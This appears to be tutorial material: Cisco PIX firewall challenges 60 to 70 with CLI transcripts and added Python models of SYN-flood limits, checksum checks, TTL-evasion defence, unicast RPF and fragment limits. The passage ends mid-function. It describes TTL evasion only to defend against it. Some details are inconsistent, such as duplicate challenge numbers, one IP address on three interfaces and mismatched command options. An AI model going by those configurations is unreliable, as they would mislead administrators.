pixfirewall(config-pmap-c)# set connection timeout ?
mpf-policy-map-class mode commands/options:
  embryonic    Configure absolute time after which an embryonic TCP connection
               will be closed, default is 0:00:30.
  half-closed  Configure idle time after which a TCP half-closed connection
               will be freed, default is 0:10:00
  tcp          Configure idle time after which a TCP connection state will be
               closed, default is 1:00:00
pixfirewall(config-pmap-c)# set connection timeout embryonic ?
mpf-policy-map-class mode commands/options:
  0:0:0 | <0:5:0> - <1192:59:59>  Idle time after which a TCP connection state
                                  will be closed, default is 1:00:00. Specify
                                  0:0:0 to never time out
  <0-0>                           Specify this value to never time out
pixfirewall(config-pmap-c)# set connection timeout embryonic 0:00:10
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ?
configure mode commands/options:
  WORD  Specify policy-map name
pixfirewall(config)# service-policy ptest ?
configure mode commands/options:
  global     Enter this keyword to specify a global policy
  interface  Enter this keyword to specify an interface policy
pixfirewall(config)# service-policy ptest global

In this case the global keyword applies the policy to all the interfaces of the PIX. The alternative is to apply it to individual interfaces:
pixfirewall(config)# service-policy ptest interface inside
pixfirewall(config)# service-policy ptest interface outside
pixfirewall(config)# service-policy ptest interface inf2

Cisco PIX Challenge 60


Outline
This challenge involves defining the maximum number of embryonic TCP connections.
Objectives
The objectives of this challenge are to:

Define maximum number of embryonic TCP connections.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set ?
mpf-policy-map-class mode commands/options:
  connection  Configure connection parameters
configure mode commands/options:
  password-recovery  Password recovery configuration
  resetinbound       Send reset to a denied inbound TCP packet
  resetoutside       Send reset to a denied TCP packet to outside interface
pixfirewall(config-pmap-c)# set connection ?
mpf-policy-map-class mode commands/options:
  advanced-options        Configure advanced connection parameters
  conn-max                Keyword to set the maximum number of all simultaneous
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  embryonic-conn-max      Keyword to set the maximum number of TCP embryonic
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  random-sequence-number  Enable/disable TCP sequence number randomization.
                          Default is to enable TCP sequence number
                          randomization
  timeout                 Configure connection timeout parameters
pixfirewall(config-pmap-c)# set connection embryonic-conn-max ?
mpf-policy-map-class mode commands/options:
  <0-65535>  Enter the maximum number for all simultaneous connections
pixfirewall(config-pmap-c)# set connection embryonic-conn-max 2
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ptest global

In this case TCP Intercept proxies connections once the limit of two embryonic (half-open) connections is reached: the PIX firewall itself sends the SYN/ACK reply to a SYN request instead of passing the SYN to the server.
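As an added example covering this challenge and the previous one (not from the NetworkSims material), the Python below tracks embryonic connections the way the two settings interact: set connection timeout embryonic 0:00:10 ages a half-open connection out after ten seconds, and set connection embryonic-conn-max 2 switches to TCP Intercept (the firewall answers the SYN itself) when two half-open connections already exist. Together they are a defence against SYN floods, because the attacker's half-open connections stop counting against the server after the timeout and never reach it once the limit is hit. The defaults in ConnectionPolicy are those stated in the help output above; the flows and timestamps are constructed, and the intercept handling is a simplification of the real proxying.

```python
from dataclasses import dataclass, field


def parse_hms(text: str) -> int:
    """'0:00:10' (h:mm:ss, the format 'set connection timeout' takes) -> seconds."""
    hours, minutes, seconds = (int(part) for part in text.split(":"))
    return hours * 3600 + minutes * 60 + seconds


@dataclass
class ConnectionPolicy:
    embryonic_timeout: int = parse_hms("0:00:30")  # default from the help output
    embryonic_conn_max: int = 0                    # 0 = unlimited (default)


@dataclass
class EmbryonicTracker:
    """Half-open TCP connections per class, keyed by flow, with the time the SYN was seen."""
    policy: ConnectionPolicy
    half_open: dict = field(default_factory=dict)

    def expire(self, now: float) -> int:
        """Forget half-open flows older than the embryonic timeout; return how many."""
        limit = self.policy.embryonic_timeout
        stale = [flow for flow, seen in self.half_open.items() if limit and now - seen >= limit]
        for flow in stale:
            del self.half_open[flow]
        return len(stale)

    def on_syn(self, flow, now: float) -> str:
        """'forward' passes the SYN to the server; 'intercept' means the firewall
        replies SYN/ACK itself and the server sees nothing until the client
        completes the handshake (modelled here as not counting the flow)."""
        self.expire(now)
        limit = self.policy.embryonic_conn_max
        if limit and len(self.half_open) >= limit:
            return "intercept"
        self.half_open[flow] = now
        return "forward"

    def on_established(self, flow) -> None:
        """Handshake completed: the connection is no longer embryonic."""
        self.half_open.pop(flow, None)


if __name__ == "__main__":
    policy = ConnectionPolicy(embryonic_timeout=parse_hms("0:00:10"), embryonic_conn_max=2)
    tracker = EmbryonicTracker(policy)
    # Constructed timeline: (client source port, seconds since start)
    for sport, t in [(40001, 0.0), (40002, 1.0), (40003, 2.0), (40004, 12.0)]:
        print(t, sport, tracker.on_syn(("198.51.100.7", sport), t), len(tracker.half_open))
```

The limit of two used in the challenge is for demonstration; on a real network it would intercept legitimate clients almost immediately, and a value sized to the server's backlog is the usual choice.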

Cisco PIX Challenge 61


Outline
This challenge involves making the PIX verify TCP checksums.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Define that checksums must be verified.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
  check-retransmission    Check retransmit data, disabled by default
  checksum-verification   Verify TCP checksum, disabled by default
  default                 Set a command to its defaults
  exceed-mss              Packet that exceed the Maximum Segment Size set by
                          peer, default is to drop packet
  no                      Negate a command or set its defaults
  reserved-bits           Reserved bits in TCP header are set, default is to
                          allow packet
  syn-data                TCP SYN packets that contain data, default is to
                          allow packet
  tcp-options             Options in TCP header
  ttl-evasion-protection  Protection against time to live (TTL) attacks,
                          enabled by default
  urgent-flag             Urgent flag and urgent offset set, default is to
                          clear flag and offset
  window-variation        Unexpected window size variation, default is to allow
                          connection
pixfirewall(config-tcp-map)# checksum-verification
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

In this case the checksum of every TCP segment is verified. Segments with an incorrect checksum, as in the case of spoofed or corrupted packets, are dropped. This has a performance cost on the firewall, so its effect on throughput should be measured. The access-list:
pixfirewall(config)# access-list Columbia permit ip any any

allows all the traffic to be checked.
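As an added example (not from the NetworkSims material), the Python below performs the check that checksum-verification turns on: it recomputes the TCP checksum over the IPv4 pseudo-header, TCP header and payload as RFC 793 specifies and compares it with the value carried in the segment. The segment builder exists only to construct test traffic; the addresses reuse those of the ARP challenge and the verifier is written here for the example.

```python
import ipaddress
import struct


def _ones_complement_sum(data: bytes) -> int:
    """16-bit one's-complement sum with end-around carry, padding an odd length with zero."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """Checksum over IPv4 pseudo-header (src, dst, zero, protocol 6, TCP length)
    plus the segment, with the segment's own checksum field treated as zero."""
    pseudo = (ipaddress.IPv4Address(src_ip).packed
              + ipaddress.IPv4Address(dst_ip).packed
              + struct.pack("!BBH", 0, 6, len(segment)))
    zeroed = segment[:16] + b"\x00\x00" + segment[18:]
    return (~_ones_complement_sum(pseudo + zeroed)) & 0xFFFF


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload=b"") -> bytes:
    """Minimal 20-byte TCP header plus payload with a correct checksum (constructed traffic).
    Data offset 5 (no options), window 65535, urgent pointer 0."""
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, header + payload)
    return header[:16] + struct.pack("!H", csum) + header[18:] + payload


def verify_tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """What 'checksum-verification' enforces: accept only when the carried checksum
    equals a fresh computation. Truncated headers fail as well."""
    if len(segment) < 20:
        return False
    carried = struct.unpack("!H", segment[16:18])[0]
    return tcp_checksum(src_ip, dst_ip, segment) == carried


if __name__ == "__main__":
    SRC, DST = "10.0.0.1", "11.0.0.1"
    seg = build_segment(SRC, DST, 40000, 80, 1000, 0, 0x02, b"abc")   # SYN with odd-length data
    print("intact   :", verify_tcp_checksum(SRC, DST, seg))
    damaged = bytearray(seg)
    damaged[13] ^= 0x10                                              # flip the ACK flag bit
    print("modified :", verify_tcp_checksum(SRC, DST, bytes(damaged)))
```

Because the pseudo-header binds the IP addresses into the sum, a segment whose addresses were rewritten without recomputing the checksum also fails, which is why address translation devices must recompute it and why a verifying firewall drops packets that reach it with stale checksums.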

Cisco PIX Challenge 62


Outline
This challenge involves having the PIX check the TCP maximum segment size (MSS).
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Define whether segments that exceed the MSS are allowed or dropped.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
  check-retransmission    Check retransmit data, disabled by default
  checksum-verification   Verify TCP checksum, disabled by default
  default                 Set a command to its defaults
  exceed-mss              Packet that exceed the Maximum Segment Size set by
                          peer, default is to drop packet
  no                      Negate a command or set its defaults
  reserved-bits           Reserved bits in TCP header are set, default is to
                          allow packet
  syn-data                TCP SYN packets that contain data, default is to
                          allow packet
  tcp-options             Options in TCP header
  ttl-evasion-protection  Protection against time to live (TTL) attacks,
                          enabled by default
  urgent-flag             Urgent flag and urgent offset set, default is to
                          clear flag and offset
  window-variation        Unexpected window size variation, default is to allow
                          connection
pixfirewall(config-tcp-map)# exceed-mss ?
tcp-map mode commands/options:
  allow  Allow packet that exceed the Maximum Segment Size
  drop   Drop packet that exceed the Maximum Segment Size
pixfirewall(config-tcp-map)# exceed-mss allow
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 63


Outline
This challenge involves preventing inconsistent TCP retransmissions.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Check for TCP re-transmissions.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
  check-retransmission    Check retransmit data, disabled by default
  checksum-verification   Verify TCP checksum, disabled by default
  default                 Set a command to its defaults
  exceed-mss              Packet that exceed the Maximum Segment Size set by
                          peer, default is to drop packet
  no                      Negate a command or set its defaults
  reserved-bits           Reserved bits in TCP header are set, default is to
                          allow packet
  syn-data                TCP SYN packets that contain data, default is to
                          allow packet
  tcp-options             Options in TCP header
  ttl-evasion-protection  Protection against time to live (TTL) attacks,
                          enabled by default
  urgent-flag             Urgent flag and urgent offset set, default is to
                          clear flag and offset
  window-variation        Unexpected window size variation, default is to allow
                          connection
pixfirewall(config-tcp-map)# check-retransmission
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 64


Outline
This challenge involves setting the limit for out-of-sequence TCP segments.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Define the limit for the TCP queue.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
Set a command to its defaults
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
Negate a command or set its defaults
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# queue-limit 64
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list test
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 64


Outline
This challenge involves checking the TCP reserved bits.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Define the action of reserved bits.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
Set a command to its defaults
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
Negate a command or set its defaults
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# reserved-bit ?
tcp-map mode commands/options:
allow Allow packets with reserved bits in TCP header
clear Clear reserved bits in TCP header and allow packet
drop
Drop packet with reserved bits set
configure mode commands/options:
threshold Configure remote-access thresholds
pixfirewall(config-tcp-map)# reserved-bit allow
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list test
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 66


Outline
This challenge involves checking if the SYN flag appears with Data.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Define the action of SYN-Data.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
Set a command to its defaults
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
Negate a command or set its defaults
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# syn-data ?
tcp-map mode commands/options:
allow Allow SYN packets that contain data
drop
Drop SYN packets that contain data
configure mode commands/options:
connection Configure sysopt connection settings
nodnsalias Disable DNS A record translation
noproxyarp Disable proxy ARP
radius
Ignore secret in RADIUS accounting responses
uauth
Allow web browsers to supply a cached username and password for
AAA authentication
pixfirewall(config-tcp-map)# syn-data drop
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list test
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 67


Outline
This challenge involves disabling TTL evasion protection.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Disable TTL evasion protection.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
Set a command to its defaults
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
Negate a command or set its defaults
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# ttl-evasion-protection
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list test
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

With TTL evasion, an attacker can send a packet to the firewall with a small TTL (Time-to-Live). Once it goes to zero, somewhere between the firewall and the host, the packet is
dropped. The attacker can then send more packets with high TTLs which will get through.
The rebuilt segments could then contain malicious information, which would not be
detected by IDSs or the firewalls.
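To make the two tcp-map checks concrete, here is an added Python model (not PIX code, and not from the original challenges) of check-retransmission from Challenge 63 and ttl-evasion-protection from this challenge. The page does not say how the PIX rewrites TTLs, so the clamp-to-lowest-TTL behaviour is an assumption, as are the constructed segment streams.

```python
"""Model of two PIX tcp-map checks: check-retransmission and ttl-evasion-protection."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass
class Segment:
    """Constructed TCP segment; only the fields the two checks look at."""
    seq: int        # sequence number of the first payload byte
    ttl: int        # IP time-to-live when the segment reaches the firewall
    payload: bytes


@dataclass
class TcpMap:
    """The two tcp-map settings, with the defaults quoted in the help text."""
    ttl_evasion_protection: bool = True    # "enabled by default"
    check_retransmission: bool = False     # "disabled by default"


@dataclass
class ConnState:
    """Per-connection state the normalizer keeps between segments."""
    min_ttl: Optional[int] = None                       # lowest TTL seen so far
    seen: Dict[int, int] = field(default_factory=dict)  # seq -> byte already forwarded


def normalize(seg: Segment, state: ConnState, tmap: TcpMap) -> Tuple[str, Segment]:
    """Apply the tcp-map to one segment.

    Returns ("drop", seg) or ("allow", forwarded_seg). Assumption (not stated on the
    page): ttl-evasion-protection is modelled as clamping every segment's TTL to the
    lowest TTL seen on the connection, so a later segment cannot be arranged to travel
    further than the one the firewall and IDS already inspected.
    """
    if tmap.check_retransmission:
        # A retransmission must carry the same bytes as the data already forwarded
        # for those sequence numbers; a mismatch is the "inconsistent retransmission".
        for i, b in enumerate(seg.payload):
            prev = state.seen.get(seg.seq + i)
            if prev is not None and prev != b:
                return "drop", seg

    # Remember the bytes we are about to forward (first version wins).
    for i, b in enumerate(seg.payload):
        state.seen.setdefault(seg.seq + i, b)

    state.min_ttl = seg.ttl if state.min_ttl is None else min(state.min_ttl, seg.ttl)
    out_ttl = state.min_ttl if tmap.ttl_evasion_protection else seg.ttl
    return "allow", Segment(seg.seq, out_ttl, seg.payload)


def run_stream(segments: List[Segment], tmap: TcpMap) -> List[Tuple[str, int]]:
    """Push a constructed segment list through one connection; returns (verdict, ttl)."""
    state = ConnState()
    results = []
    for seg in segments:
        verdict, fwd = normalize(seg, state, tmap)
        results.append((verdict, fwd.ttl))
    return results


# Constructed streams (not from the page). EVASION: a first segment with a TTL too
# small to reach the host, then a "retransmission" of the same sequence range with
# different bytes and a TTL large enough to arrive.
EVASION = [
    Segment(seq=1000, ttl=2, payload=b"first-version"),
    Segment(seq=1000, ttl=64, payload=b"other-version"),
]
# HONEST: a genuine retransmission, identical bytes.
HONEST = [
    Segment(seq=1000, ttl=60, payload=b"first-version"),
    Segment(seq=1000, ttl=60, payload=b"first-version"),
]


if __name__ == "__main__":
    print(run_stream(EVASION, TcpMap()))                           # second TTL clamped to 2
    print(run_stream(EVASION, TcpMap(check_retransmission=True)))  # second segment dropped
    print(run_stream(HONEST, TcpMap(check_retransmission=True)))   # both allowed
```

With the defaults the second segment is forwarded with TTL 2, so it expires where the first one did and never reaches the host; with check-retransmission it is dropped at the firewall instead.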

Cisco PIX Challenge 68


Outline
This challenge involves allowing or denying TCP Window variations in TCP connections.
Objectives
The objectives of this challenge are to:

Define a TCP-map.
Disable/enable TCP Window variations.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# tcp-map TEST
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
check-retransmission
Check retransmit data, disabled by default
checksum-verification
Verify TCP checksum, disabled by default
default
Set a command to its defaults
exceed-mss
Packet that exceed the Maximum Segment Size set by
peer, default is to drop packet
no
Negate a command or set its defaults
reserved-bits
Reserved bits in TCP header are set, default is to
allow packet
syn-data
TCP SYN packets that contain data, default is to
allow packet
tcp-options
Options in TCP header
ttl-evasion-protection Protection against time to live (TTL) attacks,
enabled by default
urgent-flag
Urgent flag and urgent offset set, default is to
clear flag and offset
window-variation
Unexpected window size variation, default is to allow
connection
pixfirewall(config-tcp-map)# window-variation ?
tcp-map mode commands/options:
allow-connection Allow connection with unexpected window size variation
drop-connection
Drop connection with unexpected window size variation
pixfirewall(config-tcp-map)# window-variation drop
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# match access-list test
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set connection advanced-options TEST
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy testing global

Cisco PIX Challenge 69


Outline
This challenge involves preventing IP spoofing by enabling Unicast Reverse Path
Forwarding (Unicast RPF) which ensures that all of the packets have a source IP address
which matches the correct source interface according to the routing table.
Objectives
The objectives of this challenge are to:

Enable Unicast RPF.

Example
pixfirewall(config)# int e0
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test1
pixfirewall(config-if)# exit
pixfirewall(config)# int e1
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test2
pixfirewall(config-if)# exit
pixfirewall(config)# int e2
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test3
pixfirewall(config-if)# exit
pixfirewall(config)# ip ?
configure mode commands/options:
audit
Configure the Intrusion Detection System
local
Define a local pool of IP addresses
verify Configure Unicast Reverse Path Filtering on an interface
pixfirewall(config)# ip verify ?
configure mode commands/options:
reverse-path Keyword to indicate Reverse-Path Filtering
pixfirewall(config)# ip verify reverse-path ?
configure mode commands/options:
interface Keyword to apply RPF on an interface
pixfirewall(config)# ip verify reverse-path interface ?
configure mode commands/options:
Current available interface(s):
test3
Name of interface Ethernet2
test2
Name of interface Ethernet1
test1
Name of interface Ethernet0
pixfirewall(config)# ip verify reverse-path interface test1
pixfirewall(config)# ip verify reverse-path interface test2
pixfirewall(config)# ip verify reverse-path interface test3
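The check that `ip verify reverse-path interface` enables can be modelled in a few lines. This is an added Python example, not PIX code; the routing table, interface names and sample packets are constructed, and the check is the strict form (source must be reachable through the arrival interface by longest-prefix match).

```python
"""Strict unicast RPF check, modelling 'ip verify reverse-path interface <name>'."""
import ipaddress
from typing import Dict, List, Optional, Set, Tuple

# Constructed routing table: (prefix, interface the prefix is reached through).
ROUTES: List[Tuple[str, str]] = [
    ("0.0.0.0/0", "test1"),       # default route: the Internet lies behind test1
    ("10.1.0.0/16", "test2"),     # campus network behind test2
    ("10.1.5.0/24", "test3"),     # one campus subnet is reached via test3 instead
]

# Interfaces on which "ip verify reverse-path interface ..." was entered.
RPF_INTERFACES: Set[str] = {"test1", "test2", "test3"}


def best_route(address: str, routes=ROUTES) -> Optional[str]:
    """Longest-prefix match: the interface the firewall would use to reach `address`."""
    addr = ipaddress.ip_address(address)
    best_net = None
    best_iface = None
    for prefix, iface in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_iface = net, iface
    return best_iface


def rpf_verdict(src: str, ingress: str, routes=ROUTES, enabled=RPF_INTERFACES) -> str:
    """Strict uRPF: the packet passes only if the route back to its source address
    leaves through the interface it arrived on."""
    if ingress not in enabled:
        return "allow"                    # check not configured on this interface
    expected = best_route(src, routes)
    if expected is None:
        return "drop"                     # no route back to the source at all
    return "allow" if expected == ingress else "drop"


def audit(packets: List[Tuple[str, str]], routes=ROUTES, enabled=RPF_INTERFACES) -> Dict[str, int]:
    """Count verdicts for a list of constructed (source address, ingress interface) pairs."""
    counts = {"allow": 0, "drop": 0}
    for src, ingress in packets:
        counts[rpf_verdict(src, ingress, routes, enabled)] += 1
    return counts


# Constructed sample: three legitimate packets and two whose source address belongs
# to a network that is not reachable through the interface they arrived on.
SAMPLE = [
    ("10.1.5.7", "test3"),       # subnet behind test3, arrived on test3
    ("10.1.9.9", "test2"),       # rest of the /16 behind test2
    ("203.0.113.5", "test1"),    # Internet address on the outside interface
    ("10.1.5.7", "test1"),       # inside address arriving from outside
    ("203.0.113.5", "test2"),    # Internet address arriving from the campus side
]

if __name__ == "__main__":
    for src, ingress in SAMPLE:
        print(f"{src:>14} on {ingress}: {rpf_verdict(src, ingress)}")
    print(audit(SAMPLE))   # {'allow': 3, 'drop': 2}
```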

Cisco PIX Challenge 70


Outline
This challenge involves defining the fragments per IP packet. Normally this is set at a
maximum of 24 fragments per IP packet, with up to 200 fragments awaiting reassembly.
Fragmented packets can be used in a DoS attack. This challenge restricts the number of
fragments.
Objectives
The objectives of this challenge are to:

Define maximum fragments per packet (using the fragment chain command).
Define the maximum number of awaiting fragments (using the fragment size
command).
Define the timeout for all the parts of a packet to arrive (using the fragment timeout
command).

Example
pixfirewall(config)# int e0
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test1
pixfirewall(config-if)# exit
pixfirewall(config)# int e1
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test2
pixfirewall(config-if)# exit
pixfirewall(config)# int e2
pixfirewall(config-if)# ip address 192.168.0.1 255.255.255.0
pixfirewall(config-if)# nameif test3
pixfirewall(config-if)# exit
pixfirewall(config)# fragment ?
configure mode commands/options:
chain
Configure maximum number of elements in a fragment set
size
Configure maximum number of blocks in database
timeout Configure number of seconds to assemble a fragment set
pixfirewall(config)# fragment chain ?
configure mode commands/options:
<1-8200> Maximum number of elements in a fragment set, default is 24
pixfirewall(config)# fragment chain 1 ?
configure mode commands/options:
Current available interface(s):
Test3
Name of interface Ethernet2
Test2
Name of interface Ethernet1
Test1
Name of interface Ethernet0
<cr>
pixfirewall(config)# fragment chain 1 test3
pixfirewall(config)# fragment size ?
configure mode commands/options:
<1-30000> Maximum number of blocks in database, default is 200
pixfirewall(config)# fragment size 10 test1
pixfirewall(config)# fragment timeout ?
configure mode commands/options:
<1-30> Number of seconds to assemble a fragment set, default is 5
pixfirewall(config)# fragment timeout 10 test1

The fragment chain command is used to define the fragments per packet, while the
fragment size command defines the maximum number of fragments that await assembly.
Also the fragment timeout command is used to limit the time for all parts of a packet to
arrive.
The command:
(config)# fragment chain 500
would define the fragments per packet on all interfaces, while:
(config)# fragment chain 500 outside
would define it for the outside interface.
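The three limits interact on every arriving fragment; the added Python model below (not PIX code) shows a fragment database enforcing fragment chain, fragment size and fragment timeout with the page's defaults of 24, 200 and 5 seconds. The traffic is constructed, and the per-interface form of the commands is not modelled.

```python
"""Model of the PIX fragment database limits: fragment chain, fragment size, fragment timeout."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

SetId = Tuple[str, str, int]   # (source, destination, IP identification) names a fragment set


@dataclass
class FragmentSettings:
    chain: int = 24       # fragment chain: max fragments in one packet's set (page default 24)
    size: int = 200       # fragment size: max fragments awaiting reassembly (page default 200)
    timeout: float = 5.0  # fragment timeout: seconds allowed to complete a set (page default 5)


@dataclass
class Fragment:
    set_id: SetId
    offset: int    # fragment offset in 8-byte units, as carried in the IP header
    length: int    # payload bytes in this fragment
    more: bool     # MF flag: False only on the final fragment
    time: float    # arrival time in seconds on a constructed clock


@dataclass
class FragmentSet:
    first_seen: float
    frags: List[Fragment] = field(default_factory=list)

    def complete(self) -> bool:
        """True once the fragments cover the datagram contiguously through a last fragment."""
        ordered = sorted(self.frags, key=lambda f: f.offset)
        expected = 0
        for f in ordered:
            if f.offset * 8 != expected:
                return False
            expected += f.length
        return not ordered[-1].more


class FragmentDB:
    """Holds partial datagrams and enforces the three limits on every arriving fragment."""

    def __init__(self, settings: FragmentSettings):
        self.s = settings
        self.sets: Dict[SetId, FragmentSet] = {}
        self.dropped: List[Tuple[SetId, str]] = []

    def in_use(self) -> int:
        return sum(len(fs.frags) for fs in self.sets.values())

    def _expire(self, now: float) -> None:
        stale = [k for k, fs in self.sets.items() if now - fs.first_seen > self.s.timeout]
        for k in stale:                     # fragment timeout: give up on old sets
            del self.sets[k]
            self.dropped.append((k, "timeout"))

    def accept(self, frag: Fragment) -> str:
        self._expire(frag.time)
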